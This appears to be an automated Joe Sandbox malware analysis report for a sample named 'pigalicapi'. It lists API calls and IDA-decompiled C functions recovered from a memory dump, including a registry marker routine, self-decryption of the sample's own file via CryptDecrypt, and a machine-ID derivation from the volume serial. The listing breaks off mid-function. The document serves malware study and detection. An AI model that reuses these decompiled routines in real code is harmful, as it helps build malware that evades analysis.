                                                                                                                                                                                                                                                                            0x007b40da
                                                                                                                                                                                                                                                                            0x007b40de
                                                                                                                                                                                                                                                                            0x007b40e6
                                                                                                                                                                                                                                                                            0x007b40ec
                                                                                                                                                                                                                                                                            0x007b40ec
                                                                                                                                                                                                                                                                            0x007b40f7
                                                                                                                                                                                                                                                                            0x007b4101
                                                                                                                                                                                                                                                                            0x007b4118
                                                                                                                                                                                                                                                                            0x007b411e
                                                                                                                                                                                                                                                                            0x007b413d
                                                                                                                                                                                                                                                                            0x007b4143
                                                                                                                                                                                                                                                                            0x007b4153
                                                                                                                                                                                                                                                                            0x007b4158
                                                                                                                                                                                                                                                                            0x007b415b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b416d
                                                                                                                                                                                                                                                                            0x007b417f
                                                                                                                                                                                                                                                                            0x007b418e
                                                                                                                                                                                                                                                                            0x007b4193
                                                                                                                                                                                                                                                                            0x007b4199
                                                                                                                                                                                                                                                                            0x007b419f
                                                                                                                                                                                                                                                                            0x007b41a5
                                                                                                                                                                                                                                                                            0x007b41af
                                                                                                                                                                                                                                                                            0x007b41bb
                                                                                                                                                                                                                                                                            0x007b41d2
                                                                                                                                                                                                                                                                            0x007b41bd
                                                                                                                                                                                                                                                                            0x007b41c7
                                                                                                                                                                                                                                                                            0x007b41c7
                                                                                                                                                                                                                                                                            0x007b41e3
                                                                                                                                                                                                                                                                            0x007b41f7
                                                                                                                                                                                                                                                                            0x007b4203
                                                                                                                                                                                                                                                                            0x007b420c
                                                                                                                                                                                                                                                                            0x007b4216
                                                                                                                                                                                                                                                                            0x007b416a
                                                                                                                                                                                                                                                                            0x007b416a
                                                                                                                                                                                                                                                                            0x007b422d
                                                                                                                                                                                                                                                                            0x007b4242
                                                                                                                                                                                                                                                                            0x007b4249
                                                                                                                                                                                                                                                                            0x007b424b
                                                                                                                                                                                                                                                                            0x007b424b
                                                                                                                                                                                                                                                                            0x007b425e
                                                                                                                                                                                                                                                                            0x007b4265
                                                                                                                                                                                                                                                                            0x007b426d
                                                                                                                                                                                                                                                                            0x007b426d
                                                                                                                                                                                                                                                                            0x007b4273
                                                                                                                                                                                                                                                                            0x007b4277
                                                                                                                                                                                                                                                                            0x007b4281
                                                                                                                                                                                                                                                                            0x007b428e
                                                                                                                                                                                                                                                                            0x007b4294
                                                                                                                                                                                                                                                                            0x007b429b
                                                                                                                                                                                                                                                                            0x007b429b
                                                                                                                                                                                                                                                                            0x007b42a2
                                                                                                                                                                                                                                                                            0x007b42a6
                                                                                                                                                                                                                                                                            0x007b42af
                                                                                                                                                                                                                                                                            0x007b42b6
                                                                                                                                                                                                                                                                            0x007b42c4
                                                                                                                                                                                                                                                                            0x007b42c8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b42c8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b42c4
                                                                                                                                                                                                                                                                            0x007b42cd
                                                                                                                                                                                                                                                                            0x007b42d1
                                                                                                                                                                                                                                                                            0x007b42dd

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?), ref: 007B40AF
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B40C6
                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 007B40E6
                                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 007B40F7
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 007B4101
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,007B4AC0,00000000,00000000,00000000), ref: 007B4118
                                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 007B41DD
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,007B4BA0,?,00000000,00000000), ref: 007B41F7
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007B420C
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 007B4216
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?), ref: 007B42D1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 371823443-0
                                                                                                                                                                                                                                                                            • Opcode ID: 23deecf3a481702a51aa5dae7f70d98cde672e23f253cdd27318cc899e0d535f
                                                                                                                                                                                                                                                                            • Instruction ID: f96da31b90bcd32bcd398667f6677437995c1fabd6b4a2ffc000bb6b19db9011
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23deecf3a481702a51aa5dae7f70d98cde672e23f253cdd27318cc899e0d535f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC51C3B5A4020CEBDB14DFA8DC99FEDBBB5BB48704F108219F905AB291D774A840CB54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B5E30(char _a4) {
                                                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				char* _v24;
                                                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                                                            				signed int _v29;
                                                                                                                                                                                                                                                                            				int _v36;
                                                                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                                                                            				int _v72;
                                                                                                                                                                                                                                                                            				char* _t31;
                                                                                                                                                                                                                                                                            				long _t33;
                                                                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                                                                            				char* _t45;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v9 = 0;
                                                                                                                                                                                                                                                                            				_t31 =  *0x7c18a0; // 0x7c3b88
                                                                                                                                                                                                                                                                            				_v8 = _t31;
                                                                                                                                                                                                                                                                            				_t45 =  *0x7c1894; // 0x7c3fc4
                                                                                                                                                                                                                                                                            				_v24 = _t45;
                                                                                                                                                                                                                                                                            				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                            				if(( *0x7c435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                                                            				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                            				if(_t33 == 0) {
                                                                                                                                                                                                                                                                            					_v36 = 0x20;
                                                                                                                                                                                                                                                                            					_v28 = 0x20;
                                                                                                                                                                                                                                                                            					_v29 = 0;
                                                                                                                                                                                                                                                                            					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
                                                                                                                                                                                                                                                                            					if(_t37 == 0 && _v28 == 0x10) {
                                                                                                                                                                                                                                                                            						_v29 = 1;
                                                                                                                                                                                                                                                                            						_t19 =  &_a4; // 0x7b3c39
                                                                                                                                                                                                                                                                            						if(( *_t19 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            							RegDeleteValueA(_v20, _v24);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t48 = _v29 & 0x000000ff;
                                                                                                                                                                                                                                                                            					if((_v29 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						_v72 = 0x10;
                                                                                                                                                                                                                                                                            						E007B9BD0(_t48,  &_v68, 0x10);
                                                                                                                                                                                                                                                                            						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10);
                                                                                                                                                                                                                                                                            						_v9 = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v9;
                                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                                            0x007b5e36
                                                                                                                                                                                                                                                                            0x007b5e3a
                                                                                                                                                                                                                                                                            0x007b5e3f
                                                                                                                                                                                                                                                                            0x007b5e42
                                                                                                                                                                                                                                                                            0x007b5e48
                                                                                                                                                                                                                                                                            0x007b5e4b
                                                                                                                                                                                                                                                                            0x007b5e5b
                                                                                                                                                                                                                                                                            0x007b5e5d
                                                                                                                                                                                                                                                                            0x007b5e5d
                                                                                                                                                                                                                                                                            0x007b5e64
                                                                                                                                                                                                                                                                            0x007b5e7e
                                                                                                                                                                                                                                                                            0x007b5e86
                                                                                                                                                                                                                                                                            0x007b5e8c
                                                                                                                                                                                                                                                                            0x007b5e93
                                                                                                                                                                                                                                                                            0x007b5e9a
                                                                                                                                                                                                                                                                            0x007b5eb2
                                                                                                                                                                                                                                                                            0x007b5eba
                                                                                                                                                                                                                                                                            0x007b5ec2
                                                                                                                                                                                                                                                                            0x007b5ec6
                                                                                                                                                                                                                                                                            0x007b5ecc
                                                                                                                                                                                                                                                                            0x007b5ed6
                                                                                                                                                                                                                                                                            0x007b5ed6
                                                                                                                                                                                                                                                                            0x007b5ecc
                                                                                                                                                                                                                                                                            0x007b5edc
                                                                                                                                                                                                                                                                            0x007b5ee2
                                                                                                                                                                                                                                                                            0x007b5ee4
                                                                                                                                                                                                                                                                            0x007b5ef1
                                                                                                                                                                                                                                                                            0x007b5f0b
                                                                                                                                                                                                                                                                            0x007b5f11
                                                                                                                                                                                                                                                                            0x007b5f11
                                                                                                                                                                                                                                                                            0x007b5f19
                                                                                                                                                                                                                                                                            0x007b5f19
                                                                                                                                                                                                                                                                            0x007b5f25

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,000F003F,00000000), ref: 007B5E7E
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000020), ref: 007B5EB2
                                                                                                                                                                                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,?), ref: 007B5ED6
                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 007B5F0B
                                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(00000000), ref: 007B5F19
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                            • String ID: $ $9<{
                                                                                                                                                                                                                                                                            • API String ID: 647993726-3219372539
                                                                                                                                                                                                                                                                            • Opcode ID: dc4d0d969d9ade05d6d875dfe83b6621f218127100e220d748d434d24ff8c766
                                                                                                                                                                                                                                                                            • Instruction ID: cd98aac0ea2f822e19eb31857ac275855ce44168fe8ffeeb22abc858e18e2b5c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc4d0d969d9ade05d6d875dfe83b6621f218127100e220d748d434d24ff8c766
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70313070A00249AFDB00DFD4DC55FFFBBB9AB44704F14815CE645AB281D7B99A00CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B4510(intOrPtr _a4, char _a8) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				char _v780;
                                                                                                                                                                                                                                                                            				void* _v784;
                                                                                                                                                                                                                                                                            				char _v1308;
                                                                                                                                                                                                                                                                            				long _v1312;
                                                                                                                                                                                                                                                                            				void* _v1316;
                                                                                                                                                                                                                                                                            				long _v1320;
                                                                                                                                                                                                                                                                            				intOrPtr _v1324;
                                                                                                                                                                                                                                                                            				intOrPtr _v1328;
                                                                                                                                                                                                                                                                            				signed int _v1332;
                                                                                                                                                                                                                                                                            				intOrPtr _v1336;
                                                                                                                                                                                                                                                                            				intOrPtr _v1340;
                                                                                                                                                                                                                                                                            				intOrPtr _v1344;
                                                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                                                            				signed char _t101;
                                                                                                                                                                                                                                                                            				signed char _t114;
                                                                                                                                                                                                                                                                            				void* _t153;
                                                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                                                            					return _v5;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E007B7D20(E007B7D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
                                                                                                                                                                                                                                                                            					_t155 = _t153 + 0x18;
                                                                                                                                                                                                                                                                            					GetModuleFileNameA(0,  &_v1308, 0x208);
                                                                                                                                                                                                                                                                            					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                            					_v784 = _t90;
                                                                                                                                                                                                                                                                            					if(_v784 == 0xffffffff) {
                                                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v1312 = GetFileSize(_v784, 0);
                                                                                                                                                                                                                                                                            					if(_v1312 == 0) {
                                                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                                                            						if(_v784 != 0) {
                                                                                                                                                                                                                                                                            							CloseHandle(_v784);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v1316 = _t94;
                                                                                                                                                                                                                                                                            					if(_v1316 == 0) {
                                                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v1320 = 0;
                                                                                                                                                                                                                                                                            					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t97 == 0 || _v1320 != _v1312) {
                                                                                                                                                                                                                                                                            						L20:
                                                                                                                                                                                                                                                                            						if(_v1316 != 0) {
                                                                                                                                                                                                                                                                            							VirtualFree(_v1316, 0, 0x8000);
                                                                                                                                                                                                                                                                            							_v1316 = 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						FindCloseChangeNotification(_v784); // executed
                                                                                                                                                                                                                                                                            						_v784 = 0;
                                                                                                                                                                                                                                                                            						_t101 = E007B47F0(_v1316, _v1312, _a8); // executed
                                                                                                                                                                                                                                                                            						_t156 = _t155 + 0xc;
                                                                                                                                                                                                                                                                            						if((_t101 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            							if(_v1316 != 0) {
                                                                                                                                                                                                                                                                            								VirtualFree(_v1316, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								_v1316 = 0;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                            							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                            							_v1332 = 0;
                                                                                                                                                                                                                                                                            							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                            								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
                                                                                                                                                                                                                                                                            								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
                                                                                                                                                                                                                                                                            									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v1340 = _v1344;
                                                                                                                                                                                                                                                                            								_t114 = E007B47F0(_v1336, _v1340, _a8); // executed
                                                                                                                                                                                                                                                                            								_t156 = _t156 + 0xc;
                                                                                                                                                                                                                                                                            								if((_t114 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            									_v1332 = _v1332 + 1;
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v5 = 1;
                                                                                                                                                                                                                                                                            									goto L20;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v5 = 1;
                                                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                                                            0x007b451a
                                                                                                                                                                                                                                                                            0x007b4522
                                                                                                                                                                                                                                                                            0x007b47e6
                                                                                                                                                                                                                                                                            0x007b47ed
                                                                                                                                                                                                                                                                            0x007b4532
                                                                                                                                                                                                                                                                            0x007b4556
                                                                                                                                                                                                                                                                            0x007b455b
                                                                                                                                                                                                                                                                            0x007b456c
                                                                                                                                                                                                                                                                            0x007b458b
                                                                                                                                                                                                                                                                            0x007b4591
                                                                                                                                                                                                                                                                            0x007b459e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b45b3
                                                                                                                                                                                                                                                                            0x007b45c0
                                                                                                                                                                                                                                                                            0x007b47d0
                                                                                                                                                                                                                                                                            0x007b47d7
                                                                                                                                                                                                                                                                            0x007b47e0
                                                                                                                                                                                                                                                                            0x007b47e0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b47d7
                                                                                                                                                                                                                                                                            0x007b45d6
                                                                                                                                                                                                                                                                            0x007b45dc
                                                                                                                                                                                                                                                                            0x007b45e9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b45ef
                                                                                                                                                                                                                                                                            0x007b4617
                                                                                                                                                                                                                                                                            0x007b461f
                                                                                                                                                                                                                                                                            0x007b47a9
                                                                                                                                                                                                                                                                            0x007b47b0
                                                                                                                                                                                                                                                                            0x007b47c0
                                                                                                                                                                                                                                                                            0x007b47c6
                                                                                                                                                                                                                                                                            0x007b47c6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b4637
                                                                                                                                                                                                                                                                            0x007b463e
                                                                                                                                                                                                                                                                            0x007b4644
                                                                                                                                                                                                                                                                            0x007b4660
                                                                                                                                                                                                                                                                            0x007b4665
                                                                                                                                                                                                                                                                            0x007b466d
                                                                                                                                                                                                                                                                            0x007b467f
                                                                                                                                                                                                                                                                            0x007b468f
                                                                                                                                                                                                                                                                            0x007b4695
                                                                                                                                                                                                                                                                            0x007b4695
                                                                                                                                                                                                                                                                            0x007b46a8
                                                                                                                                                                                                                                                                            0x007b46c2
                                                                                                                                                                                                                                                                            0x007b46c8
                                                                                                                                                                                                                                                                            0x007b46e3
                                                                                                                                                                                                                                                                            0x007b470f
                                                                                                                                                                                                                                                                            0x007b473b
                                                                                                                                                                                                                                                                            0x007b476b
                                                                                                                                                                                                                                                                            0x007b473d
                                                                                                                                                                                                                                                                            0x007b4750
                                                                                                                                                                                                                                                                            0x007b4750
                                                                                                                                                                                                                                                                            0x007b4777
                                                                                                                                                                                                                                                                            0x007b478f
                                                                                                                                                                                                                                                                            0x007b4794
                                                                                                                                                                                                                                                                            0x007b479c
                                                                                                                                                                                                                                                                            0x007b46dd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b479e
                                                                                                                                                                                                                                                                            0x007b479e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b479e
                                                                                                                                                                                                                                                                            0x007b479c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b46e3
                                                                                                                                                                                                                                                                            0x007b466f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b466f
                                                                                                                                                                                                                                                                            0x007b461f

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 007B456C
                                                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 007B458B
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 007B45AD
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 007B45D6
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 007B4617
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 007B463E
                                                                                                                                                                                                                                                                              • Part of subcall function 007B47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B482A
                                                                                                                                                                                                                                                                              • Part of subcall function 007B47F0: GetLastError.KERNEL32 ref: 007B4834
                                                                                                                                                                                                                                                                              • Part of subcall function 007B47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B4850
                                                                                                                                                                                                                                                                              • Part of subcall function 007B47F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 007B48EB
                                                                                                                                                                                                                                                                              • Part of subcall function 007B47F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 007B490B
                                                                                                                                                                                                                                                                              • Part of subcall function 007B47F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 007B493C
                                                                                                                                                                                                                                                                              • Part of subcall function 007B47F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 007B496F
                                                                                                                                                                                                                                                                              • Part of subcall function 007B47F0: CryptDestroyKey.ADVAPI32(00000000), ref: 007B4982
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007B468F
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B47C0
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 007B47E0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2585753175-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3956e914ae580e5c0a6b6ed04fb6e90ab4d21af1bc4d68870edd3b1156f168a6
                                                                                                                                                                                                                                                                            • Instruction ID: 5ddcf79406b1c45362e4ae308849ed792285dbefc4ef77cf0fc4c0991aa30eab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3956e914ae580e5c0a6b6ed04fb6e90ab4d21af1bc4d68870edd3b1156f168a6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E814C759016289BDB24CB54DC94BEAB7B4AF49306F0091D9E508AB2C2DB789F81CF54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                                                                            			E007B9D20(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				char _v292;
                                                                                                                                                                                                                                                                            				intOrPtr _v296;
                                                                                                                                                                                                                                                                            				char _v404;
                                                                                                                                                                                                                                                                            				long _v408;
                                                                                                                                                                                                                                                                            				char _v673;
                                                                                                                                                                                                                                                                            				char _v676;
                                                                                                                                                                                                                                                                            				intOrPtr _v680;
                                                                                                                                                                                                                                                                            				long _v684;
                                                                                                                                                                                                                                                                            				signed int _v688;
                                                                                                                                                                                                                                                                            				short* _v692;
                                                                                                                                                                                                                                                                            				signed int _v696;
                                                                                                                                                                                                                                                                            				unsigned int _v700;
                                                                                                                                                                                                                                                                            				intOrPtr _v704;
                                                                                                                                                                                                                                                                            				char _v900;
                                                                                                                                                                                                                                                                            				signed int _v904;
                                                                                                                                                                                                                                                                            				signed int _v908;
                                                                                                                                                                                                                                                                            				int _v912;
                                                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                                                                            				short** _t76;
                                                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0x20;
                                                                                                                                                                                                                                                                            					_v24 = 6;
                                                                                                                                                                                                                                                                            					_v684 = 0;
                                                                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                                                                            					_v408 = 0;
                                                                                                                                                                                                                                                                            					_v16 = 0x19660d;
                                                                                                                                                                                                                                                                            					_v296 = 0x3c6ef35f;
                                                                                                                                                                                                                                                                            					_v680 = _a4;
                                                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
                                                                                                                                                                                                                                                                            						_v673 = 0;
                                                                                                                                                                                                                                                                            						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
                                                                                                                                                                                                                                                                            						if(_t71 != 0) {
                                                                                                                                                                                                                                                                            							_v688 = 0xffffffff;
                                                                                                                                                                                                                                                                            							E007B7D20(_t71,  &_v900, 0, 0xc0);
                                                                                                                                                                                                                                                                            							_v700 = 0;
                                                                                                                                                                                                                                                                            							_t74 = E007B9F70( &_v900, 0xc0,  &_v700); // executed
                                                                                                                                                                                                                                                                            							if(_t74 != 0) {
                                                                                                                                                                                                                                                                            								_v904 = 0;
                                                                                                                                                                                                                                                                            								while(_v904 < _v700 >> 2) {
                                                                                                                                                                                                                                                                            									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
                                                                                                                                                                                                                                                                            									_v904 = _v904 + 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v696 = _v684;
                                                                                                                                                                                                                                                                            							_v908 = 0;
                                                                                                                                                                                                                                                                            							while(_v908 < 4) {
                                                                                                                                                                                                                                                                            								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
                                                                                                                                                                                                                                                                            								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
                                                                                                                                                                                                                                                                            								_v908 = _v908 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t76 =  &_v692;
                                                                                                                                                                                                                                                                            							__imp__StringFromCLSID(_a4, _t76); // executed
